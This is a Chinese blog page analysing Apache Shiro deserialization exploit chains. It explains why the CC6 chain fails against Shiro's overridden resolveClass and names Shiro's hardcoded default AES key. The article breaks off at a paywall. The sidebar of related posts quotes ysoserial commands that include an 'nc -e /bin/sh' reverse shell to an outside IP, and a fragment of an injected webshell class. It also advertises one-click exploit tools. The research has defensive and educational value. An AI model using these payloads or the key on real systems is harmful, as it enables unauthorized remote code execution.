shiro反序列化之k1/2利用链

最新推荐文章于 2024-05-12 13:23:48 发布
最新推荐文章于 2024-05-12 13:23:48 发布
阅读量1.9k 收藏 1
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/123248394
版权

前言

shiro的k1/k2链条其实之前我已经分析过了,但是呢,没以文章的形式发出来。可能有点懒惰了。上篇文章我们一起看了t3协议,t3反序列化的修复手段是在resolveClass方法添加检查,增加黑名单的形式。而shiro是重写了resolveClass方法导致很多利用链无法使用,但是shiro在编写的时候,并不是为了防御反序列化漏洞才去重写的resolveClass,但是就是这么一个无意间的举动,导致了防御住了大部分攻击。下面我们分析。

直接使用cc6

cc6的利用链我们前面有,拿来直接用,默认keykPH+bIxk5D2deZiIxcaaaA==去加密,再base64编码。
在这里插入图片描述
发送后我们可以看到tomcat报错:
在这里插入图片描述
看到错误栈中最下面的那个类:
org.apache.shiro.io.ClassResolvingObjectInputStream.resolveClass
在这里插入图片描述
resolveClass方法是反序列化中用来查找类的方法,shiro反序列化的函数不是我们述职的ObjectInputStream().readObject,而是ClassResolvingObjectInputStream类,他继承了ObjectInputStream类,重写了resolveClass方法,原因就出现 再重写后的resolveClass方法,跟进ClassUtils.forName(osc.getName());
在这里插入图片描述
出异常时加载的类名为 [Lorg.apache.commons.collections.Transformer;。这个类名看起来 怪,其实就是表示org.apache.commons.collections.Transformer的数组。
跟进Class clazz = THREAD_CL_ACCESSOR.loadClass(fqcn);
在这里插入图片描述
加载和获取当前线程的类,参考phith0n的结论:如果反序列化流中包含非Java自身的数组,则会出现无法加载类的错误。 所以CC6

最低0.47元/天 解锁文章
XiaoLeiZhaoO
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shiro-EXP:Apache Shiro 序列漏洞检测与利用工具,一键注入内存马
05-26
项目介绍 基于Apache Shiro序列漏洞进行利用链的探测,附内存马。 利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。 探测到利用链后,根据提示,将屏幕输出的payload粘贴至POST请求Header头RememberMe字段处,至于data携带的数据,自行决策,本文文末附内存马,可直接粘贴至data中使用,或自行生成指定命令的字节码片段替换。 与项目相关文章首发于: Shiro exp使用手册 Shiro rememberMe序列漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值先base64解码然后AES解密再序列,就导
shiro序列工具,加强版
12-27
在"shiro序列工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的序列漏洞以及如何利用和防范这些漏洞。 序列漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
Apache shiro 序列利用
m0_54850467的博客
09-01 744
*触发序列流程:****结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是linux系统,则睡眠10s同理,可以考虑结合触发Java异常进判断,若系统返回对应的报错系统,或者返回通用的报错提示,说明当前的key和gadget组合是成功的:**...
Java Shiro序列CommonsCollections利用链分析_shiro 利用链(1)
最新发布
2401_84968643的博客
05-12 832
本文主要分析CC1利用链,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java序列和php序列漏洞的区别(希望大家不要有惯性思维认为序列漏洞都一样,其实java序列和php序列的差别还是很大的并介绍了复现学习java序列漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用链的入口点)三个步骤,讲述利用链的构建。
Java Shiro序列CommonsCollections利用链分析
qq_44192006的博客
04-24 614
本文主要分析CC1利用链,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java序列和php序列漏洞的区别(希望大家不要有惯性思维认为序列漏洞都一样,其实java序列和php序列的差别还是很大的并介绍了复现学习java序列漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用链的入口点)三个步骤,讲述利用链的构建。纸上得来终觉浅,绝知此事要躬行。
Shiro安全(三):Shiro自身利用链之CommonsBeanutils
weixin_43263451的博客
08-05 2234
前面在利用shiro序列时,都是利用CC链,但是这需要服务端引入CommonsCollections组件。所以最好是找到一条shiro自身的利用链,而不需要任何的前提条件在之前曾介绍过,在序列这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉 及到大小比较,进而执行 java.util.Comparator 接口的 compare() 方法。是否能够找到其他的Comparator呢本文主要是要理解如何在没有CC组件等外部依赖的情况下,找到shiro自身的利用链来提高攻击的成功率。...
Javaweb安全——序列漏洞-Shiro(CommonsBeanutils利用链)
weixin_43610673的博客
07-08 1622
先来看一段这个漏洞描述:这里使用的shiro应用demo为https://github.com/phith0n/JavaThings/tree/master/shirodemo测试的jdk版本为8u111 以及 8u211 都试过可以触发。的特征:处理cookie的流程:生成payload的流程:使用shiro内置的类 org.apache.shiro.crypto.AesCipherService进行AES加密,先要找到硬编码的key,然后写一个exp生成payload。key的位置位于(shiro...
shiro序列脚本.zip
07-28
标题 "shiro序列脚本.zip" 指向的是一个与Apache Shiro安全框架相关的序列漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
shiro序列复现.zip
08-03
2. **测试环境**:可能包含一个预配置的服务器环境,模拟了存在序列漏洞的Shiro应用,使得用户可以在可控的环境中测试漏洞复现过程。 3. **文档**:解释了如何使用提供的工具和代码,以及漏洞的工作原理和修复...
序列利用工具ShiroExploit.V2.51.7z
08-31
ShiroExploit.V2.51是一款专注于Apache Shiro框架的序列利用工具。Apache Shiro是一款流行的Java安全框架,用于身份认证、授权和会话管理。由于其广泛的使用,Shiro中的序列漏洞成为了黑客关注的焦点。...
SHIRO-550:Shiro RememberMe 1.2.4序列突破
03-10
Shiro RememberMe 1.2.4序列突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
shiro序列漏洞利用工具
11-09
图形界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
Shiro_Xray:CommonsBeanutils1,CommonsCollectionsK1
04-14
Shiro_Xray 小工具 CommonsBeanutils1 CommonsCollectionsK1 CommonsCollectionsK2 Getshell冰蝎 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import java.io.PrintWriter; import java.net.URLDecoder; import sun.misc.BASE64Decoder; public class 10837093162496 extends AbstractTranslet { static { Object var1 = null; String var2 = Thread.currentThread().getContextClassLoa
Java序列利用链挖掘之Shiro序列
HongYu012的博客
02-24 1178
在跟了一遍commons-collections系列的payload后,终于可以开始解决一下当时对shiro序列模凌两可的认识了。 当前,不管是国内实际的xx行动还是ctf比赛,shiro序列会经常看到。但在实际利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro-sample中的commons-collections:3.2.1(2021-03-16更新,这里经p牛指正,shiro并没有依赖cc库,详情)。 我们前面已经对commons-collections系列利用链...
shiro无依赖利用
jy13172的博客
07-23 713
我们只要调用它的另一个构造函数,然后调用JDK或者CB自带的类就行了,同时还要满足两个条件,一方面就是继承。我们上次用的CC3的依赖,这次把这个依赖删了,使用shiro自带的依赖打。是嵌套的意思 跟进去发现,readMethod是我们传进去的参数。CC是对java集合类的增强,CB是对JavaBean的增强。虽然是CC4中的类,但是我们在传入系统的时候就把他修改成。是可以动态加载类的,也就是可以代码执行,所以。是我们传的参数,这里很可能是一个可以利用的点。,而且优先队列的参数也是可以控制的。
shiro之过滤链
大鱼的博客
07-03 1499
当我们的shiro交给spring管理后,我们可以在web.xml中定义过滤,但是这样的过滤显得粗粒了,因为只是给了一个/*: <filter-mapping> <filter-name>shiroFilter</filter-name> <url-pattern>/*</url-pattern> </fi...
shiro拦截器链
java_zc的博客
03-21 751
http://blog.csdn.net/u013378306/article/details/50545552 shiro默认过滤器(10个)  anon -- org.apache.shiro.web.filter.authc.AnonymousFilterauthc -- org.apache.shiro.web.filter.authc.FormAuthenticati
shiro序列利用
07-29
Shiro 序列利用链是一种攻击技术,利用 Apache Shiro 框架中的漏洞,通过序列序列的过程来执行恶意代码。这种攻击方式通常被用来绕过身份验证和授权机制,获取未经授权的访问权限。 具体来说,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值